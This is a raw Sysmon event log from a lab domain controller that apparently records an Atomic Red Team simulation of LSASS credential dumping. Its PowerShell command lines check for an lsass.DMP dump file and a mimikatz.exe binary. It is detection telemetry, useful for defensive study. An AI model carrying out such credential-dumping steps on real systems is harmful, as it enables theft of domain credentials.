21:10:04.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.717{4DB9351A-A32C-60D3-3C06-00000000CF01}5544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {cmd /c \""if not exist %%tmp%%\lsass.DMP (exit /b 1)\""} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.686{4DB9351A-A32C-60D3-3B06-00000000CF01}4352ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.623{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.623{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.577{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.577{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:04.545{4DB9351A-A32C-60D3-3B06-00000000CF01}4352\PSHost.132689562044570727.4352.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025122Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.530{4DB9351A-A32C-60D3-3B06-00000000CF01}4352ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lba3ra0v.mzz.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025121Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.530{4DB9351A-A32C-60D3-3B06-00000000CF01}4352ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_k25nh1gu.i25.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025120Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.514{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_k25nh1gu.i25.ps12021-06-23 21:10:04.514 10341000x800000000000000025119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.483{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.452{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.452{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.452{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.452{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.452{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.452{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.452{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.452{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.457{4DB9351A-A32C-60D3-3B06-00000000CF01}4352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 